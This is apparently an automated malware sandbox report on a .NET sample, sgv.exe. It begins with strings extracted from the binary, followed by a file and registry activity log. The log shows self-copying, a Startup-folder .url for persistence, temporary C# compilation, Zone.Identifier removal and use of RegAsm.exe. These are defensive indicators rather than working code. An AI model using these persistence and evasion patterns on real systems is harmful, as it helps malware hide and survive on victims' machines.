}f2T
#oDS
'>E>w
{9<<l
IDAM
aa<4
-HC
wf`_
U3lzdGVtLkRyYXdpbmcuZGxs
4#w9
NLCo
m-=+
72Yw
szkv0bv1
Go9
G<8f
"E}T
e>]c
X.2j
MRMWrapperDictionary
/4:?e
|DW%
E
&Q
V}^<3
_i!K
sUt
:(ZGG
g$/n
y)=@
I0On
~DE?B
9WJ:
h56Df
5'V_
>gQ
-E>f
System.Runtime.CompilerServices
DI5%
o|r7
k)93
MKay
GNJ]2
YD1s
?d9
D&!N
SuppressIldasmAttribute
k53qr7wz
iS(
6Gc@
O){
N(=S
P]66,
aD'Y
f28A
=21P
J:HG
yX&
N^Bg
BBM{
RGd>Nf
0
]E
SS^4t
/T&dY
set_CompilerOptions
BG.A
*DCCP
yD3^E
k7>^
v#*R
SlZBR
Sb]3
>4Jok5g
odHK
N_B'
Y=/Y!N?v
^^rF
1qnMQgD4$
f:Be
vDE^DG
[=6q
YH\s:x
${#S
de|G
GetManifestResourceNames
@`<<
=^>f
wxjOH
Syvn
i@FS
L_Vx
&L-8
*PcD
p'>_
QQ\HU`
_$O+v
g:Zd
kVX
DA
YYYBBB
_6ZG
{F$
s9l-
jox]
\Qy2
3VY<
1_LE
aqP jx
J)5
`8u/
k^cD
R8%w
N<O|
rYb
WGkM/E
G4.6
mzDy
<GetElementsBeforeSelf>d__42
}isV "
H/LI{
,N-KUB
l>."L
IInnerList
(-
O E3N
TaJoZ
3i
2
zDgcD
\ $zFm
q8#_
yvlu
L3!*
RhC
r-p3!
0>tv
Pw=:Nr
kAhF4
j}
T{Y/
TlR2
O(4$
z
QU"D9x
"zeA
LN?-1
P
@;
-dWf;rbI
NQ;G
@8;#
ktAw
P
^Y
h+zj
h7HG
1"H
:
FSWAsyncResult
x{cd
)h$
O
g7F|@
W:*5
oPf:=F<E1
<Module>
'^->
P E
$B1O|NSZ
*
]
,BT^
)NDcZ
Z?Gt
G27.p
XL:3g
hPqM
XEMY
oi2:q
EL3Yu
Rd~90
BN=%@
ZRC.X
p;cj>
h$7
$mB9
Ft^3
tLC
Rw3<
u~n
aMN$
Y-"Z
.:9z
n$\b9cvS
S_apl
VT
ka
MX*CfA'
RVe3
gN
L
}8
4
!O#Zj
k
I`
>TQRP0
NSI^-
uXb
*~
f#-JC4
;CA'G`
\'ZJ
gWa
R
t+C;
7.7H
F9A
+Fq?(
[cIE]l
c:MC
>@@1i
">6NF
Ps|>F
sz
ngynwvp5
H\kv~F
EM4
aEdo
64U-
Y	&
:q66
~jaC,o"
Jdi$
-($
{Rwi
9=^
GTT{
#GUID
]%'hXn8
Le%
nz@0
2_+Q
ElpI
q"K
0;:A
Ig1B
8~>z
Q
Bt
8"DE
ESE6ux
N1<
o)D_
|XX*j
hpCyj
xG3"
^}EI
J~Yru
U^cAe
=S]3
;.h<
S0.s
h,M~
B?/m
'UP);wPw
p#Gj
Kt)8
FTti"
y%u
AyT^-
^hKo
@!l4O
7MzBb
\WMM
NcW(
p08F
?{,i
fu[B[B
8{4n
X+>
p7I
% jC
bWX
w7epw5kt
Ze
Im
8s
32Mw
BQG
WLCU
=b v
Nullable`1
}'@K
7<1J
rp8x
gN[%p
~KfQ
*=EA
6)-<
{bU8[
pv5:
838W
@
Iht.
x!C3jh
!Y*AM
f3UD
Bxn{a
o$RnH
,:GX
"LZ\
t>_q
,C_l
sIur
yBA
z=ni=
>~F'
k;dX
dGdT
%dbL
#Rl<2
]d{$
0p3:
Dp4O
X+|
X+a
)bIsI
yR
;
~|{n#
MnMZ
qyVDV
~qE%
LVtv?t
\	{=>
fyfD-
like
{
Y8#
Encoding
@Tjl
^/
P
B=~IY
-y}
I3ru
Vi_&ny
F,FC
fw)
;3X
*
aJJ=
#y,o
~NJl{T
bl%2
HNG'
t!G+q
ED|D
o?OA
qG[g`
~yJ
0

BE!
#E#k
%`]J
}8FTe
BfkE
]C q
*He
u8$g[
ku,|
_sZ]
`V_MZ
R845
;G=~OX
woofu5xs
YD-y9hl
jq'(
rWgFZ
@ie*
=ys\8
x%d-S
^Vf=
K8oh
QP#z
"^bW
p;QtB
IFti
B>x-W
pMf
yH`Z
pwmg0zsx
!3{s=
M|l<
]PL^i
_Bm
$3.6
aXan
F$$
"OxP
Ny}X
xdm
+d8'
qI<C
0	`N@
~DRW
-BI{
Replace
)-VL
u),z
qDsBiI
dze6
S{27
#D&Z
9eI-i-
u<u
dDQy,<M
SR[d5
j7{
!BVI?
#Wd
+UoUU
$"7E<6
cD3~u
S^Wz
(>&y~
deBQDod
sr$6
#_A3
_TtLwK]
XG 8
"8F4
32IL]@
DYl[
M_Ed
b~kE
cuFUG
AWx:
*YD9
-k\f
Dj/P
@,r.
Jij~
TPc/8
{k%q
!Z V,ky
n13ehL
@z\j
v.6F
ly|[
EhxIO
DV .
Asttree
)L)e
#8G
1^.B
<nY7L
33i?
Y1	uwj~
vfqi
MJ$v
}'v
\U-P
._cO
.8f5
[n:rK
H#y;
|I?Xi
yLGC|
Ij
[MnD
gk/Y8
MfB7j
Gt.W
System.Windows.Forms
ZBCI
ZKv	w
`M"+Is
K R
p(*G:
Ji4J
's2d+<
~]	O
S
hY
/2]&
WV
v
Hkg:
Am
U
z}07&h*
>evM
|N	H;
qdyj
mU:k
`HZ
XCCfJ
.T)M
CFJ#zeu
WriteLine
[V]
3h4LVi
gnQ^
4
.H
@Gh_`
Q&LC
I;-<
`DYk
qxZp
G3nx
'9!b
zU9~\
$fG~rn
e2?
XLlP
%5:m
C?'I!
mPA?
G
h}*
cC6R"
V55f}
+P"
oo$=
-@Yl
>oh,pppRZ
5+H{S
^kXa
&Ny'
cjA=
Iv{<
UAmA>k:^}C
156D
.O({Cr
\J
e
tG[d%4
DB(
xF
nGh!4
wo:~
phs4m5gh
/ :2Q
4T)W
IpT@
P@T,
@)v
L+7-
77V~#
+P"\
meq
p<
>?jV
kIJB
kPtB
%Z x>
uha6
O%4v
9ZL0
:xB
%Cl
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven05_64 Seven05_64 VirtualBox 2018-04-18 21:28:42 2018-04-18 21:31:33 171

8 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven05_64 Seven05_64 VirtualBox 2018-04-18 21:28:42 2018-04-18 21:31:33 171

8 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\sgv.exe.config
C:\Users\Seven01\AppData\Local\Temp\sgv.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSVCR120_CLR0400.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.localgac
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ole32.dll
\Device\KsecDD
C:\Windows\assembly\NativeImages_v4.0.30319_32\bs5Bety8sIwflhbM.not\*
C:\Users\Seven01\AppData\Local\Temp\sgv.INI
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\Microsoft.Net\assembly\GAC_32\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Users\Seven01\AppData\Local\Temp\ighazuig.tmp
C:\Users\Seven01\AppData\Local\Temp\ighazuig.0.cs
C:\Users\Seven01\AppData\Local\Temp\ighazuig.dll
C:\Users\Seven01\AppData\Local\Temp\ighazuig.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Users\Seven01\AppData\Local\Temp\ighazuig.out
C:\Users\Seven01\AppData\Local\Temp\ighazuig.err
C:\Users\Seven01\AppData\Local\Temp\ighazuig.pdb
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux
C:\Users\Seven01\AppData\Local\Temp\sgv.exe.Local\
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\shell32.dll
C:\Users\Seven01\sgv.exe
C:\Users\Seven01\sgv.exe:Zone.Identifier
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SYrSDt.url
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.Linq.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\ntdll.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest
C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll
C:\Windows\System32\mscoree.dll.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\System.Management.dll
C:\Windows
C:\Windows\Microsoft.NET
C:\Windows\Microsoft.NET\Framework
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll
C:\Users\Seven01\AppData\Local\Temp\System.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll
C:\Users\Seven01\AppData\Local\Temp\System.Drawing.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll
C:\Users\Seven01\AppData\Local\Temp\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll
C:\Users\Seven01\AppData\Local\Temp\CSC705FD4CA1C4ADE86CE37CC17CD43F6.TMP
C:\Users\Seven01\AppData\Local\Temp\RESF1D2.tmp
C:\Windows\System32\tzres.dll

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\sgv.exe.config
C:\Users\Seven01\AppData\Local\Temp\sgv.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Users\Seven01\AppData\Local\Temp\ighazuig.dll
C:\Users\Seven01\AppData\Local\Temp\ighazuig.pdb
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll
C:\Users\Seven01\AppData\Local\Temp\ighazuig.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config
C:\Users\Seven01\AppData\Local\Temp\ighazuig.0.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest
C:\Users\Seven01\AppData\Local\Temp\CSC705FD4CA1C4ADE86CE37CC17CD43F6.TMP
C:\Users\Seven01\AppData\Local\Temp\RESF1D2.tmp
C:\Windows\System32\tzres.dll

Write Files

C:\Users\Seven01\AppData\Local\Temp\ighazuig.tmp
C:\Users\Seven01\AppData\Local\Temp\ighazuig.0.cs
C:\Users\Seven01\AppData\Local\Temp\ighazuig.dll
C:\Users\Seven01\AppData\Local\Temp\ighazuig.cmdline
C:\Users\Seven01\AppData\Local\Temp\ighazuig.out
C:\Users\Seven01\AppData\Local\Temp\ighazuig.err
C:\Users\Seven01\sgv.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SYrSDt.url
C:\Users\Seven01\AppData\Local\Temp\ighazuig.pdb
C:\Users\Seven01\AppData\Local\Temp\CSC705FD4CA1C4ADE86CE37CC17CD43F6.TMP
C:\Users\Seven01\AppData\Local\Temp\RESF1D2.tmp

Delete Files

C:\Users\Seven01\AppData\Local\Temp\ighazuig.cmdline
C:\Users\Seven01\AppData\Local\Temp\ighazuig.dll
C:\Users\Seven01\AppData\Local\Temp\ighazuig.out
C:\Users\Seven01\AppData\Local\Temp\ighazuig.tmp
C:\Users\Seven01\AppData\Local\Temp\ighazuig.pdb
C:\Users\Seven01\AppData\Local\Temp\ighazuig.0.cs
C:\Users\Seven01\AppData\Local\Temp\ighazuig.err
C:\Users\Seven01\sgv.exe:Zone.Identifier
C:\Users\Seven01\AppData\Local\Temp\RESF1D2.tmp
C:\Users\Seven01\AppData\Local\Temp\CSC705FD4CA1C4ADE86CE37CC17CD43F6.TMP

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v4.0.30319
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v4.0.30319\SKUs\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v4.0.30319\SKUs\default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sgv.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\NGen\Policy\v4.0
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Servicing
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 024
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Deployment__b03f5f7f11d50a3a
